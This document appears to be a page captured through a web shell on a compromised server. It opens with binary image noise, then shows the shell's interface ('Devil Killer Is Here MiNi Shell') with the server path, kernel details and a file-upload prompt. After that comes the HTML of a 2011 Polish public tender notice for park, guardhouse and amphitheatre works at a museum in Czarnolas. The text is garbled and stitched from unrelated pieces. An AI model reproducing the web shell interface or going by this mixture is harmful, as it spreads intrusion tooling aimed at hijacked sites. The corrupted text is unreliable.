JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110215/54189-N-2011.html

<p class="kh_header"><b>Radom: Wykonanie robót aranżacji parku z budową kordegardy, amfiteatru i remontem budynku gospodarczego na terenie zabytkowego zespołu dworsko parkowego w Czarnolesie w ramach  Projektu :  Jan Kochanowski - inspiracją kulturową Mazowsza.</b><br>
<b>Numer ogłoszenia: 54189 - 2011; data zamieszczenia: 15.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum im. Jacka Malczewskiego , ul. Rynek 11, 26-600 Radom, woj. mazowieckie, tel. 048 3624329 w. 105, faks 048 3623481.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót aranżacji parku z budową kordegardy, amfiteatru i remontem budynku gospodarczego na terenie zabytkowego zespołu dworsko parkowego w Czarnolesie w ramach  Projektu :  Jan Kochanowski - inspiracją kulturową Mazowsza..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót aranżacji parku z budową kordegardy, amfiteatru i remontem budynku gospodarczego na terenie zabytkowego zespołu dworsko parkowego w Czarnolesie.
Miejsce realizacji:
Muzeum Jana Kochanowskiego w Czarnolesie, 
Czarnolas 5. 26-720 Policzna powiat  Zwoleń woj. mazowieckie
Powierzchnia inwestycji :  99.600m2
Powierzchnia zabudowy projektowanych  i przebudowanych . obiektów: 788 m2 
Powierzchnia istniejącej zabudowy pozostającej bez zmian : 726 m2
Powierzchnia utwardzeń granitowych: 1495 m2
Powierzchnia nawierzchni żwirowej: 1015 m2
Powierzchnia utwardzeń i zabudowy razem : 4024 m2
Powierzchnia zieleni : 95.576 m2 
 Wykonanie robót budowlanych obejmuje następujące prace:
1. Wykonanie robót aranżacji parku:
a) wykonanie instalacji nagłaśniającej parku
b) wykonanie instalacji oświetleniowej parku
c) wykonanie ogrodzenia parku 
d) wymiana nawierzchni i budowa ciągów komunikacyjnych
e)  rewaloryzacja drzewostanu parku wraz z rekultywacją runa parkowego, trawników i  rabat kwiatowych
f) wykonanie robót związanych z rewitalizacją stawów
2. Wybudowanie kordegardy 
Charakterystyczne parametry inwestycji :
Powierzchnia zabudowy : 210,0 m2
Powierzchnia użytkowa: 259,52 m2
Powierzchni netto: 293,23 m2
Kubatura: 731 m3
3. Wybudowanie amfiteatru 
Charakterystyczne parametry  :
Powierzchnia zabudowy : 270,0 m2
Powierzchnia użytkowa: 195,73 m2
Powierzchni netto: 280,18 m2
Kubatura: 499 m3   
4. Dostosowanie dworu dla osób niepełnosprawnych.
5. Remont budynku  gospodarczego i rozbiórka  toalety parkowej.
6. Wykonanie instalacji monitoringu 
7. Wykonanie inwentaryzacji powykonawczej wszystkich elementów wchodzących w skład przedmiotu zamówienia.  
Szczegółowy opis przedmiotu zamówienia znajduje się w Projekcie budowlano-wykonawczym budynku kordegardy na terenie zabytkowego zespołu dworsko-parkowego, Projekcie budowlano-wykonawczym amfiteatru na terenie zabytkowego zespołu dworsko-parkowego, Projekcie rozbiórki budynku toalet w zespole dworsko-parkowym, Projekcie dostosowania dla potrzeb osób niepełnosprawnych budynku dworu,  Projekcie realizowanym w ramach wniosku o dofinansowanie z EFRR ,   Jan Kochanowski- inspiracją kulturową Mazowsza oraz   Aneksie do projektu realizowanego w ramach wniosku o dofinansowanie z EFRR Jan Kochanowski - inspiracją kulturową  - opisach technicznych i rysunkach, przedmiarach robót, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz w  przedmiarach robót.
Jeżeli w jakimkolwiek miejscu  tj. Projekcie budowlano-wykonawczym budynku kordegardy na terenie zabytkowego zespołu dworsko-parkowego, Projekcie budowlano-wykonawczym amfiteatru na terenie zabytkowego zespołu dworsko-parkowego, Projekcie rozbiórki budynku toalet w zespole dworsko-parkowym, Projekcie dostosowania dla potrzeb osób niepełnosprawnych budynku dworu, Projekcie realizowanym w ramach wniosku o dofinansowanie z EFRR ,   Jan Kochanowski- inspiracją kulturową Mazowsza oraz   Aneksie do projektu realizowanego w ramach wniosku o dofinansowanie z EFRR Jan Kochanowski - inspiracją kulturową  - opisach technicznych i rysunkach, przedmiarach robót, Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy lub równoważne. Oznacza to, iż do urządzeń wskazanych w dokumentacji projektowej, dla których są wskazane znaki towarowe, patenty lub pochodzenie można stosować urządzenia i materiały równoważne pod względem parametrów technicznych, jakościowych, funkcjonalnych oraz użytkowych. Przewidziane do zastosowania urządzenia i materiały powinny spełniać parametry co najmniej takie jak  określone w dokumentacji projektowej i nie powinny być gorsze od założeń projektowych.
Wszelkie odstępstwa potencjalnego wykonawcy od założeń dokumentacji projektowej w zakresie stosowania materiałów i urządzeń oraz technologii wykonania, muszą być udokumentowane załączonymi do oferty parametrami techniczno- wytrzymałościowymi, szczegółowymi rysunkami technicznymi, atestami PZH, aprobatami, deklaracjami zgodności, kartami katalogowymi urządzeń i materiałów zamiennych. Niniejsze dokumenty muszą w sposób jednoznaczny stwierdzać równoważność proponowanych urządzeń i materiałów w stosunku do przyjętych w  projekcie. Powyższe zmiany muszą być wykazane w załączniku Nr 9 do SIWZ Wykaz rozwiązań równoważnych i dołączone do oferty przetargowej.
Brak wskazania w załączniku propozycji zastosowania rozwiązań równoważnych oznaczać będzie deklarację wykonawcy, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń i materiałów określonych w dokumentacji projektowej. Dokumenty potwierdzające spełnienie wymogów określonych niniejszą specyfikacją należy załączyć do oferty przetargowej.
Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych rozwiązań. Zamawiający zastrzega sobie także prawo do korzystania z opinii ekspertów.
Nie dopuszcza się wprowadzania zmian w stosunku do założeń dokumentacji projektowej, których skutki rzutowałyby na przyjęte w projekcie warunki architektoniczne a zwłaszcza parametry technologiczne. W przypadku zaoferowania produktów równoważnych konieczne będzie również uzyskanie przez Wykonawcę akceptacji Projektanta oraz Wojewódzkiego Konserwatora Zabytków na zastosowanie produktu równoważnego. 
Przedmiot zamówienia należy również realizować zgodnie z warunkami określonymi w : 1.  Pozwoleniu na budowę nr 257/10 wydanego przez Starostę Zwoleńskiego, 2 .Decyzji Nr 667/DR/10  Mazowieckiego Wojewódzkiego Konserwatora Zabytków (MWKZ) - Delegatura w Radomiu na zamierzenia  inwestycyjne wg projektu 3. Decyzji MWKZ  Nr 692/DR/10 na rozbiórkę budynku toalet oraz oficyny dworskiej, 4. Decyzji MWKZ  Nr  825/DR/10, 5. Pozwoleniu wodno prawnym wydanym przez Starostę Zwoleńskiego z dnia 23.09.2010r. , 
6. Decyzja Nr 21/DR/11 z dnia 26.01.2011r. Mazowieckiego Wojewódzkiego Konserwatora Zabytków - Delegatura w Radomiu, 7. Decyzja Nr 4/11 z dnia 31.01.2011r. Starosty Zwoleńskiego, 8. Decyzja MWKZ Nr 51/DR/11 z dnia 10.02.2011r. 
Do obowiązków Wykonawcy należy  uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie obiektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.00-9, 45.45.30.00-7, 45.11.00.00-1, 45.23.24.60-4, 45.31.51.00-9, 45.23.31.40-2, 45.11.21.00-5, 45.11.27.11-2, 45.34.20.00-6, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości:
50 000,00  PLN (słownie złotych: pięćdziesiąt   tysięcy 00/100 PLN)  do dnia 04.03.2011r. do godziny 10:00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie oświadczenia Wykonawcy dołączonego do oferty. Wzór stanowi załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Na potwierdzenie spełnienia warunku Wykonawca wykaże że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co najmniej dwie roboty budowlano - remontowe wielobranżowe obejmujące swym zakresem roboty  sanitarne, elektryczne, drogowe, w zakresie zieleni na łączną kwotę minimum  2 000 000,00  złotych w  tym:  
co najmniej jedną robotę na kwotę  minimum 1 000 000,00 złotych. 
co najmniej jedną robotę  odpowiadającą  swoim rodzajem robotom stanowiącym przedmiot zamówienia. Za roboty odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia uznaje się roboty budowlane  objęte nadzorem konserwatorskim Wojewódzkiego Konserwatora Zabytków, polegające na rewitalizacji parków, w których wykonano elementy infrastruktury technicznej oraz nawierzchnię (drogi, ścieżki, alejki, itp.) , a także roboty w zakresie zieleni (wycinka, pielęgnacja, nasadzenia itp.) . Wymagane jest przedstawienie dokumentu potwierdzającego że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. W przypadku korzystania z wiedzy i doświadczenia innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia i dołączy do oferty pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów w zakresie wiedzy i doświadczenia oraz, będzie on zobowiązany do powierzenia realizacji zamówienia temu podmiotowi i wskazania go jako podwykonawcy w formularzu oferty, lub utworzenie konsorcjum z podmiotem posiadającym wymaganą wiedzę i doświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie oświadczenia Wykonawcy dołączonego do oferty. Wzór stanowi załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Na potwierdzenie spełnienia warunku Wykonawca wykaże że będzie dysponował osobami posiadającymi uprawnienia budowlane (wykonawcze) do kierowania w zakresie: 
1) branży sanitarnej - uprawnienia wykonawcze w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (sanitarnych) bez ograniczeń  lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów 
2) branży elektrycznej - uprawnienia budowlane wykonawcze w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń  lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów 
3) branży drogowej - uprawnienia budowlane wykonawcze w specjalności drogowej bez ograniczeń lub równoważne im ważne uprawnienia wydane według wcześniejszych przepisów.
4) branży zieleni - uprawnienia do kierowania pracami konserwatorskimi lub pracami restauratorskimi polegającymi na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków  zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej, spełniający warunek określony w § 8 ust. 3 Rozporządzenia Ministra Kultury z dnia 09.06.2004r. Dz.U. Nr 150 poz. 1579. 
5) kierownika budowy posiadający uprawnienia budowlane w wymaganej specjalności konstrukcyjno-budowlanej  do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,  z  co najmniej 5 letnim doświadczeniem zawodowym w nadzorowaniu robót budowlanych lub kierowaniu budową oraz   posiadaną, odbytą i potwierdzoną co najmniej 2-letnią praktykę zawodową przy zabytkach nieruchomych (wskazać miejsce realizacji). Wykonawca może polegać na osobach zdolnych do wykonania przedmiotu zamówienia innych podmiotów , niezależnie od  charakteru prawnego łączących go z nimi stosunków,   na zasadach określonych w art. 26 ust. 2b ustawy - Prawo zamówień publicznych, Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia i dołączy do oferty pisemne zobowiązanie innych podmiotów lub inne dokumenty potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Na potwierdzenie spełnienia warunku Wykonawca wykaże że posiada środki finansowe lub zdolność kredytową na kwotę minimum 500 000 zł. W przypadku korzystania przez Wykonawcę ze zdolności finansowej innych  podmiotów  zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych, Wykonawca przedstawi pisemne zobowiązanie tego podmiotu potwierdzające oddanie do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia wraz z potwierdzeniem, iż podmiot udostępniający posiada wymaganą zdolność finansową
Ocena potwierdzenia czy wykonawca wykazał spełnienie warunków udziału zawartych w pkt. III.3.1- III.3.5, nastąpi na podstawie wymaganych i załączonych przez wykonawcę do oferty dokumentów i oświadczeń. Z dokumentów i oświadczeń musi wynikać, że wykonawca spełnia warunek udziału na dzień składania ofert. Nie wykazanie w wystarczający sposób spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Z postępowania wyklucza się również wykonawców , którzy nie wykażą spełnienia warunków udziału w postępowaniu   określonych w art. 24 ust. 2 ustawy pzp.
Ofertę wykonawcy wykluczonego, uznaje się za odrzuconą (art. 24 ust. 4 ustawy pzp)..
Ocena spełnienia warunków wymaganych od  wykonawcy w postępowaniu o zamówienie publiczne zostanie dokonana przez Zamawiającego poprzez analizę złożonych dokumentów i oświadczeń przy zastosowaniu formuły  spełnia, nie spełnia, z zastrzeżeniem postanowień art.26 ust.3 ustawy - Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
